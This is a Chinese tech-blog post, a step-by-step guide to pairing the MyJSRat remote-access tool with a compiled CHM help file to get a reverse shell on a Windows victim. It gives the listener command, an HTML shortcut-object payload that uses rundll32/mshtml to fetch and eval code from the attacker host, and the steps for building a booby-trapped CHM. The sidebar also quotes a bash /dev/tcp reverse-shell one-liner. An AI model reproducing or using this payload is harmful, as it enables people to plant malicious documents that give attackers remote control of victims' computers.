MyJSRat结合CHM来反弹shell

最新推荐文章于 2024-03-30 10:00:02 发布
最新推荐文章于 2024-03-30 10:00:02 发布
阅读量721 收藏
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/100385438
版权

项目地址:https://github.com/Ridter/MyJSRat

python MyJSRat.py -i 192.168.61.130 -p 8080

-i:为攻击机的IP地址

-p:为监听的端口

 

 

然后访问http://192.168.61.130:8080/wtf得到攻击载荷

 

 

然后新建一个test.html把攻击载荷复制到里面

 

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value='这里填写Payload'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

写payload需要注意的是rundll32.exe前后要有 ,

 

我的payload如下

 

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',rundll32.exe, javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.61.130:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

然后在打开Easy CHM

 

 

在C盘下我建立了一个test文件夹并把test.html放到里面

然后新建工程并选择C:\test\

 

 

然后就可以在右边看到我们的攻击载荷

 

 

然后编译生成下CHM文件

 

 

 

我们就可以在C盘根目录看到一个test.CHM文件

 

 

双击运行文件,Kali即可得到shell

 

大方子
关注
专栏目录
反弹shell汇总
chang113的博客
06-12 794
反弹shell整理
shell命令合集,chm格式,适合刚开始开发linux的使用
01-14
在Linux操作系统中,Shell是用户与系统交互的主要接口,它提供了一种命令行界面,允许用户通过输入特定的指令来执行各种任务。对于刚接触Linux开发的人员来说,掌握基本的Shell命令是必不可少的。这份名为“shell...
JS探测内网是否存在bash漏洞,反弹shell
Jiajia2017的博客
11-26 229
来t00ls几天啦,也没时间写原创。  --(本人首发土司啦。)最近看到老外一篇文章,觉得很不错。测试了一下把这个东西把过程分享给大伙,希望大伙不要踩,忙完这几天就写原创调用一个js,扫描内网是否存在bash漏洞,然后反弹shell回来的一个小东西。搞APT应该用得到啦。测试过程:老外发的一个Poc我内网搭建测试先监听了本地250端口然后搭建之后访问 1 h...
利用js文件反弹shell
ST0new的博客
07-07 1826
前言 本篇文章是按照大佬的文章复现 公众号: 洛米唯熊 环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 工具地址 https://github.com/CroweCybersecurity/ps1encode 克隆 在kali克隆工具 命令:git clone https://github.com/Cr...
[Shell]利用JS文件反弹Shell
baguangman5501的博客
09-17 449
0x01 模拟环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 0x02 工具地址 https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.g...
高级shell脚本编程指南 chm版(中文版)
03-13
你可以把本书作为教材, 自学手册, 或者是关于shell脚本技术的文档. 书中的练习和样例脚本中的注释将会与读者进行更好的互动, 但是最关键的前提是: 想真正学习脚本编程的唯一途径就是亲自动手编写脚本.
2本linux shell 编程chm
03-09
通过深入学习和实践这两个CHM文档提供的内容,你将能够编写出高效、灵活的Shell脚本来解决各种自动化任务,提高Linux系统管理的效率。在实际应用中,不断积累经验和技巧,你的Shell编程技能会更加炉火纯青。
shell中文chm格式帮助文档
02-13
shell脚本语言中文chm格式
Shell编程手册.chm
01-05
Shell是一个命令解释器。它不仅是操作系统内核与用户之间的绝缘层,同时也是一种功能相当强大的编程语言。(chm无法显示内容时需在属性中“解除锁定”)
myjs.rar javaScript demo
03-01
myjs.rar javaScript demo 共20个类,343个例子
rat.js:唯一的不和谐机器人-最终在js中
03-28
rat.js 唯一的不和谐机器人-最终在js中
js获取ip_AWS Lambda Node.js 反弹shell
weixin_39641231的博客
11-12 130
PS:文章一般都会先首发于我的个人Blog上:AWS Lambda Node.js 反弹shell ,有需要的小伙伴可以直接订阅我的Blog,获取最新内容。0x00 前言原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。0x01 被攻击端直接套到lambda函数里就行了(function(){ var net = require("net"), cp...
探索MyJSRat:一款强大的JavaScript远程访问工具
最新发布
gitblog_00076的博客
03-30 265
探索MyJSRat:一款强大的JavaScript远程访问工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 MyJSRat是一个开源的、基于JavaScript的远程访问木马(RAT)框架,由GitHub用户@Ridter创建并维护。该项目允许安全研究人员和渗透测试人员在合法的安全测试中实现远程控制目标系统,进行信息收集与操作。同时,对于恶意软件的研究者,MyJSR...
Log4j2漏洞(二)3种方式复现反弹shell
02-08 1856
Log4j2漏洞(二)3种方式复现反弹shell,有对环境要求苛刻的、有步骤多的、也有简单易现的,复现时按需要选择,如果是学习我建议都学习下。
【基础篇】————21、隐匿攻击之JavaScript
Fly_鹏程万里
05-26 484
有一些命令和控制工具可以使用各种fof方法来隐藏恶意流量或以各种格式执行植入。Casey Smith最初开发了一个原型工具,它使用JavaScript作为有效载荷,并连接回监听Web服务器。一位安全研究人员3gstudent扩展了Casey Smith的工作,并在PowerShell中开发了JSRat,它提供了一些额外的功能。此工具的其他变体存在于Python中,因此主控主机可以是Linux机器或...
CHM + JSBackdoor捆绑后门
journeyIT的博客
01-10 643
CHM + JSBackdoor捆绑后门 使用交互模式的JSRat server: #!bash python MyJSRat.py -i 192.168.1.101 -p 8080 访问 http://192.168.1.101:8080/wtf 获取攻击代码如下: #!bash rundll32.exe javascript:"\..\ms...
反弹shell命令
Shanfenglan's blog
10-29 2697
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
掌握Shell编程:从入门到精通
随着技术的发展,现代shell编程已经不再局限于传统的命令行操作,它也能够与其他语言结合使用,或者开发出图形化的用户界面。此外,shell脚本编写者需要考虑到代码的安全性和性能问题,这包括避免注入攻击、优化命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值